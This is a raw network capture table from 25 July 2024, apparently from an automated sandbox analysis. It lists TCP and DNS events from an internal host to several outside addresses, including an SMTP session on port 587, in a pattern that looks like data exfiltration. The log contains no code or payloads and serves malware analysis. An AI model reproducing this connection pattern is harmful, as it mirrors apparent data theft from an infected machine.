                                            Jul 25, 2024 10:05:10.730474949 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:10.730639935 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:10.796252012 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:10.796376944 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:10.797065020 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:10.797138929 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:10.798047066 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:10.798119068 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:10.816549063 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:10.816631079 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:11.068833113 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:11.068849087 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:11.068979979 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:11.069163084 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:11.069195986 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:11.069241047 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:11.069246054 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:11.069295883 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:11.069669962 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:11.069713116 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:11.069736004 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:11.069768906 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:11.069772005 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:11.069957018 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:11.070463896 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:11.070494890 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:11.070579052 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:11.070583105 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:11.070681095 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:12.117763042 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:12.117777109 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:12.117877007 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:12.118104935 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:12.118175983 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:12.118406057 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:12.118464947 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:12.118735075 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:12.118798018 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:12.119473934 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:12.119543076 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:12.120352030 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:12.120413065 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:12.121236086 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:12.121299028 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:12.121922016 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:12.121984005 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:12.123445988 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:12.123507977 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:12.123831987 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:12.123894930 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:12.127146959 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:12.127211094 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:12.127825022 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:12.127888918 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:12.128598928 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:12.128658056 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:12.129072905 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:12.129128933 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:12.130034924 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:12.130094051 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:12.130543947 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:12.130599976 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:12.131800890 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:12.131836891 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:12.131859064 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:12.131864071 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:12.131885052 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:12.131902933 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:12.132606983 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:12.132664919 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:12.132699013 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:12.132736921 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:12.132756948 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:12.132761002 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:12.132781029 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:12.132792950 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:12.132796049 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:12.132837057 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:12.142045975 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:12.142057896 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:12.459999084 CEST4971680192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:12.464929104 CEST8049716193.122.6.168192.168.2.5
                                            Jul 25, 2024 10:05:12.465009928 CEST4971680192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:12.465281010 CEST4971680192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:12.470071077 CEST8049716193.122.6.168192.168.2.5
                                            Jul 25, 2024 10:05:20.347295046 CEST8049716193.122.6.168192.168.2.5
                                            Jul 25, 2024 10:05:20.350888968 CEST4971680192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:20.356040001 CEST8049716193.122.6.168192.168.2.5
                                            Jul 25, 2024 10:05:21.518094063 CEST8049716193.122.6.168192.168.2.5
                                            Jul 25, 2024 10:05:21.569955111 CEST4971680192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:21.749022961 CEST49717443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:21.749061108 CEST44349717188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:21.749218941 CEST49717443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:21.750690937 CEST49717443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:21.750705004 CEST44349717188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:22.271240950 CEST44349717188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:22.271323919 CEST49717443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:22.274976015 CEST49717443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:22.274986982 CEST44349717188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:22.275331974 CEST44349717188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:22.280320883 CEST49717443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:22.320494890 CEST44349717188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:22.428028107 CEST44349717188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:22.428299904 CEST44349717188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:22.428405046 CEST49717443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:22.433322906 CEST49717443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:22.442203999 CEST4971680192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:22.447129965 CEST8049716193.122.6.168192.168.2.5
                                            Jul 25, 2024 10:05:23.832575083 CEST8049716193.122.6.168192.168.2.5
                                            Jul 25, 2024 10:05:23.834600925 CEST49718443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:23.834657907 CEST44349718188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:23.834745884 CEST49718443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:23.835012913 CEST49718443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:23.835047007 CEST44349718188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:23.882523060 CEST4971680192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:24.334069967 CEST44349718188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:24.335887909 CEST49718443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:24.335920095 CEST44349718188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:24.468348980 CEST44349718188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:24.468472958 CEST44349718188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:24.468544960 CEST49718443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:24.468960047 CEST49718443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:24.472268105 CEST4971680192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:24.473438978 CEST4971980192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:24.478468895 CEST8049719193.122.6.168192.168.2.5
                                            Jul 25, 2024 10:05:24.478554010 CEST4971980192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:24.478636026 CEST4971980192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:24.483918905 CEST8049719193.122.6.168192.168.2.5
                                            Jul 25, 2024 10:05:24.490802050 CEST8049716193.122.6.168192.168.2.5
                                            Jul 25, 2024 10:05:24.490874052 CEST4971680192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:32.717781067 CEST8049719193.122.6.168192.168.2.5
                                            Jul 25, 2024 10:05:32.719419003 CEST49721443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:32.719472885 CEST44349721188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:32.719579935 CEST49721443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:32.719873905 CEST49721443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:32.719902039 CEST44349721188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:32.773118973 CEST4971980192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:33.212629080 CEST44349721188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:33.221705914 CEST49721443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:33.221798897 CEST44349721188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:33.365952015 CEST44349721188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:33.366096020 CEST44349721188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:33.366291046 CEST49721443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:33.366688013 CEST49721443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:33.371121883 CEST4972280192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:33.376122952 CEST8049722193.122.6.168192.168.2.5
                                            Jul 25, 2024 10:05:33.376209974 CEST4972280192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:33.376296997 CEST4972280192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:33.381577015 CEST8049722193.122.6.168192.168.2.5
                                            Jul 25, 2024 10:05:45.499855995 CEST8049722193.122.6.168192.168.2.5
                                            Jul 25, 2024 10:05:45.501215935 CEST49723443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:45.501264095 CEST44349723188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:45.501343012 CEST49723443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:45.501585960 CEST49723443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:45.501595020 CEST44349723188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:45.554429054 CEST4972280192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:45.962045908 CEST44349723188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:45.963740110 CEST49723443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:45.963773012 CEST44349723188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:46.110181093 CEST44349723188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:46.110404015 CEST44349723188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:46.110502005 CEST49723443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:46.110809088 CEST49723443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:46.114377975 CEST4972280192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:46.114922047 CEST4972480192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:46.119822979 CEST8049724193.122.6.168192.168.2.5
                                            Jul 25, 2024 10:05:46.119976044 CEST4972480192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:46.120785952 CEST4972480192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:46.122132063 CEST8049722193.122.6.168192.168.2.5
                                            Jul 25, 2024 10:05:46.122215986 CEST4972280192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:46.125597000 CEST8049724193.122.6.168192.168.2.5
                                            Jul 25, 2024 10:05:52.240860939 CEST8049724193.122.6.168192.168.2.5
                                            Jul 25, 2024 10:05:52.241206884 CEST8049724193.122.6.168192.168.2.5
                                            Jul 25, 2024 10:05:52.241305113 CEST4972480192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:52.261405945 CEST4972580192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:52.266441107 CEST8049725193.122.6.168192.168.2.5
                                            Jul 25, 2024 10:05:52.266551018 CEST4972580192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:52.266782045 CEST4972580192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:52.271703959 CEST8049725193.122.6.168192.168.2.5
                                            Jul 25, 2024 10:05:53.057436943 CEST8049725193.122.6.168192.168.2.5
                                            Jul 25, 2024 10:05:53.057872057 CEST4972480192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:53.058773994 CEST49726443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:53.058820963 CEST44349726188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:53.059039116 CEST49726443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:53.059446096 CEST49726443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:53.059456110 CEST44349726188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:53.064575911 CEST8049724193.122.6.168192.168.2.5
                                            Jul 25, 2024 10:05:53.064647913 CEST4972480192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:53.101300955 CEST4972580192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:53.603132010 CEST44349726188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:53.604880095 CEST49726443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:53.604904890 CEST44349726188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:53.749618053 CEST44349726188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:53.749741077 CEST44349726188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:53.749809980 CEST49726443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:53.750427961 CEST49726443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:53.754084110 CEST4972580192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:53.755458117 CEST4972780192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:53.761039972 CEST8049725193.122.6.168192.168.2.5
                                            Jul 25, 2024 10:05:53.761112928 CEST4972580192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:53.761285067 CEST8049727193.122.6.168192.168.2.5
                                            Jul 25, 2024 10:05:53.761349916 CEST4972780192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:53.761452913 CEST4972780192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:53.767155886 CEST8049727193.122.6.168192.168.2.5
                                            Jul 25, 2024 10:05:56.685353994 CEST8049727193.122.6.168192.168.2.5
                                            Jul 25, 2024 10:05:56.687074900 CEST49728443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:56.687113047 CEST44349728188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:56.687280893 CEST49728443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:56.687468052 CEST49728443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:56.687475920 CEST44349728188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:56.726424932 CEST4972780192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:57.230670929 CEST44349728188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:57.232511997 CEST49728443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:57.232525110 CEST44349728188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:57.379291058 CEST44349728188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:57.379398108 CEST44349728188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:57.379503965 CEST49728443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:57.379930019 CEST49728443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:57.383555889 CEST4972780192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:57.384979010 CEST4972980192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:57.389113903 CEST8049727193.122.6.168192.168.2.5
                                            Jul 25, 2024 10:05:57.389173985 CEST4972780192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:57.390050888 CEST8049729193.122.6.168192.168.2.5
                                            Jul 25, 2024 10:05:57.390372038 CEST4972980192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:57.390372038 CEST4972980192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:57.395626068 CEST8049729193.122.6.168192.168.2.5
                                            Jul 25, 2024 10:05:59.175483942 CEST8049729193.122.6.168192.168.2.5
                                            Jul 25, 2024 10:05:59.176990986 CEST49730443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:59.177026987 CEST44349730188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:59.177144051 CEST49730443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:59.177539110 CEST49730443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:59.177552938 CEST44349730188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:59.226393938 CEST4972980192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:59.659151077 CEST44349730188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:59.661120892 CEST49730443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:59.661142111 CEST44349730188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:59.809408903 CEST44349730188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:59.809501886 CEST44349730188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:05:59.809575081 CEST49730443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:59.810234070 CEST49730443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:05:59.813668966 CEST4972980192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:59.815330029 CEST4973180192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:59.821476936 CEST8049729193.122.6.168192.168.2.5
                                            Jul 25, 2024 10:05:59.821506977 CEST8049731193.122.6.168192.168.2.5
                                            Jul 25, 2024 10:05:59.821676970 CEST4973180192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:59.821676970 CEST4973180192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:59.821934938 CEST4972980192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:05:59.826973915 CEST8049731193.122.6.168192.168.2.5
                                            Jul 25, 2024 10:06:01.481292009 CEST8049731193.122.6.168192.168.2.5
                                            Jul 25, 2024 10:06:01.483108997 CEST49732443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:06:01.483148098 CEST44349732188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:06:01.483256102 CEST49732443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:06:01.483844042 CEST49732443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:06:01.483859062 CEST44349732188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:06:01.523216963 CEST4973180192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:06:01.994290113 CEST44349732188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:06:01.996455908 CEST49732443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:06:01.996479034 CEST44349732188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:06:02.130865097 CEST44349732188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:06:02.130999088 CEST44349732188.114.97.3192.168.2.5
                                            Jul 25, 2024 10:06:02.131061077 CEST49732443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:06:02.131465912 CEST49732443192.168.2.5188.114.97.3
                                            Jul 25, 2024 10:06:02.144761086 CEST4973180192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:06:02.153523922 CEST8049731193.122.6.168192.168.2.5
                                            Jul 25, 2024 10:06:02.153678894 CEST4973180192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:06:02.158296108 CEST49733443192.168.2.5149.154.167.220
                                            Jul 25, 2024 10:06:02.158329964 CEST44349733149.154.167.220192.168.2.5
                                            Jul 25, 2024 10:06:02.158390999 CEST49733443192.168.2.5149.154.167.220
                                            Jul 25, 2024 10:06:02.158875942 CEST49733443192.168.2.5149.154.167.220
                                            Jul 25, 2024 10:06:02.158893108 CEST44349733149.154.167.220192.168.2.5
                                            Jul 25, 2024 10:06:02.819839954 CEST44349733149.154.167.220192.168.2.5
                                            Jul 25, 2024 10:06:02.819937944 CEST49733443192.168.2.5149.154.167.220
                                            Jul 25, 2024 10:06:02.823020935 CEST49733443192.168.2.5149.154.167.220
                                            Jul 25, 2024 10:06:02.823029995 CEST44349733149.154.167.220192.168.2.5
                                            Jul 25, 2024 10:06:02.823359966 CEST44349733149.154.167.220192.168.2.5
                                            Jul 25, 2024 10:06:02.824852943 CEST49733443192.168.2.5149.154.167.220
                                            Jul 25, 2024 10:06:02.872489929 CEST44349733149.154.167.220192.168.2.5
                                            Jul 25, 2024 10:06:03.177937031 CEST44349733149.154.167.220192.168.2.5
                                            Jul 25, 2024 10:06:03.177998066 CEST44349733149.154.167.220192.168.2.5
                                            Jul 25, 2024 10:06:03.178160906 CEST49733443192.168.2.5149.154.167.220
                                            Jul 25, 2024 10:06:03.178571939 CEST49733443192.168.2.5149.154.167.220
                                            Jul 25, 2024 10:06:08.880276918 CEST4971980192.168.2.5193.122.6.168
                                            Jul 25, 2024 10:06:09.131901026 CEST49734587192.168.2.566.29.159.53
                                            Jul 25, 2024 10:06:09.136874914 CEST5874973466.29.159.53192.168.2.5
                                            Jul 25, 2024 10:06:09.137160063 CEST49734587192.168.2.566.29.159.53
                                            Jul 25, 2024 10:06:10.481323957 CEST5874973466.29.159.53192.168.2.5
                                            Jul 25, 2024 10:06:10.481558084 CEST49734587192.168.2.566.29.159.53
                                            Jul 25, 2024 10:06:10.488656998 CEST5874973466.29.159.53192.168.2.5
                                            Jul 25, 2024 10:06:10.736872911 CEST5874973466.29.159.53192.168.2.5
                                            Jul 25, 2024 10:06:10.737097025 CEST49734587192.168.2.566.29.159.53
                                            Jul 25, 2024 10:06:10.742297888 CEST5874973466.29.159.53192.168.2.5
                                            Jul 25, 2024 10:06:10.896609068 CEST5874973466.29.159.53192.168.2.5
                                            Jul 25, 2024 10:06:10.897536039 CEST49734587192.168.2.566.29.159.53
                                            Jul 25, 2024 10:06:10.906554937 CEST5874973466.29.159.53192.168.2.5
                                            Jul 25, 2024 10:06:11.055099964 CEST5874973466.29.159.53192.168.2.5
                                            Jul 25, 2024 10:06:11.055125952 CEST5874973466.29.159.53192.168.2.5
                                            Jul 25, 2024 10:06:11.055146933 CEST5874973466.29.159.53192.168.2.5
                                            Jul 25, 2024 10:06:11.055232048 CEST5874973466.29.159.53192.168.2.5
                                            Jul 25, 2024 10:06:11.055247068 CEST5874973466.29.159.53192.168.2.5
                                            Jul 25, 2024 10:06:11.055250883 CEST49734587192.168.2.566.29.159.53
                                            Jul 25, 2024 10:06:11.055294037 CEST49734587192.168.2.566.29.159.53
                                            Jul 25, 2024 10:06:11.088752031 CEST49734587192.168.2.566.29.159.53
                                            Jul 25, 2024 10:06:11.095947027 CEST5874973466.29.159.53192.168.2.5
                                            Jul 25, 2024 10:06:11.247514963 CEST5874973466.29.159.53192.168.2.5
                                            Jul 25, 2024 10:06:11.250340939 CEST49734587192.168.2.566.29.159.53
                                            Jul 25, 2024 10:06:11.255323887 CEST5874973466.29.159.53192.168.2.5
                                            Jul 25, 2024 10:06:11.406343937 CEST5874973466.29.159.53192.168.2.5
                                            Jul 25, 2024 10:06:11.406676054 CEST49734587192.168.2.566.29.159.53
                                            Jul 25, 2024 10:06:11.411526918 CEST5874973466.29.159.53192.168.2.5
                                            Jul 25, 2024 10:06:11.563924074 CEST5874973466.29.159.53192.168.2.5
                                            Jul 25, 2024 10:06:11.566451073 CEST49734587192.168.2.566.29.159.53
                                            Jul 25, 2024 10:06:11.571614981 CEST5874973466.29.159.53192.168.2.5
                                            Jul 25, 2024 10:06:11.726864100 CEST5874973466.29.159.53192.168.2.5
                                            Jul 25, 2024 10:06:11.727293015 CEST49734587192.168.2.566.29.159.53
                                            Jul 25, 2024 10:06:11.732264042 CEST5874973466.29.159.53192.168.2.5
                                            Jul 25, 2024 10:06:11.886275053 CEST5874973466.29.159.53192.168.2.5
                                            Jul 25, 2024 10:06:11.886509895 CEST49734587192.168.2.566.29.159.53
                                            Jul 25, 2024 10:06:11.896810055 CEST5874973466.29.159.53192.168.2.5
                                            Jul 25, 2024 10:06:12.076332092 CEST5874973466.29.159.53192.168.2.5
                                            Jul 25, 2024 10:06:12.076586962 CEST49734587192.168.2.566.29.159.53
                                            Jul 25, 2024 10:06:12.081533909 CEST5874973466.29.159.53192.168.2.5
                                            Jul 25, 2024 10:06:12.232597113 CEST5874973466.29.159.53192.168.2.5
                                            Jul 25, 2024 10:06:12.233282089 CEST49734587192.168.2.566.29.159.53
                                            Jul 25, 2024 10:06:12.233339071 CEST49734587192.168.2.566.29.159.53
                                            Jul 25, 2024 10:06:12.233377934 CEST49734587192.168.2.566.29.159.53
                                            Jul 25, 2024 10:06:12.233406067 CEST49734587192.168.2.566.29.159.53
                                            Jul 25, 2024 10:06:12.238388062 CEST5874973466.29.159.53192.168.2.5
                                            Jul 25, 2024 10:06:12.238972902 CEST5874973466.29.159.53192.168.2.5
                                            Jul 25, 2024 10:06:12.610163927 CEST5874973466.29.159.53192.168.2.5
                                            Jul 25, 2024 10:06:12.655905962 CEST49734587192.168.2.566.29.159.53
                                            TimestampSource PortDest PortSource IPDest IP
                                            Jul 25, 2024 10:05:09.730678082 CEST5610053192.168.2.51.1.1.1
                                            Jul 25, 2024 10:05:09.982188940 CEST53561001.1.1.1192.168.2.5
                                            Jul 25, 2024 10:05:12.441382885 CEST5631653192.168.2.51.1.1.1
                                            Jul 25, 2024 10:05:12.449825048 CEST53563161.1.1.1192.168.2.5
                                            Jul 25, 2024 10:05:21.737171888 CEST5253553192.168.2.51.1.1.1
                                            Jul 25, 2024 10:05:21.748289108 CEST53525351.1.1.1192.168.2.5
                                            Jul 25, 2024 10:06:02.144911051 CEST5255453192.168.2.51.1.1.1
                                            Jul 25, 2024 10:06:02.157700062 CEST53525541.1.1.1192.168.2.5
                                            Jul 25, 2024 10:06:09.119333982 CEST6190653192.168.2.51.1.1.1
                                            Jul 25, 2024 10:06:09.129265070 CEST53619061.1.1.1192.168.2.5
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
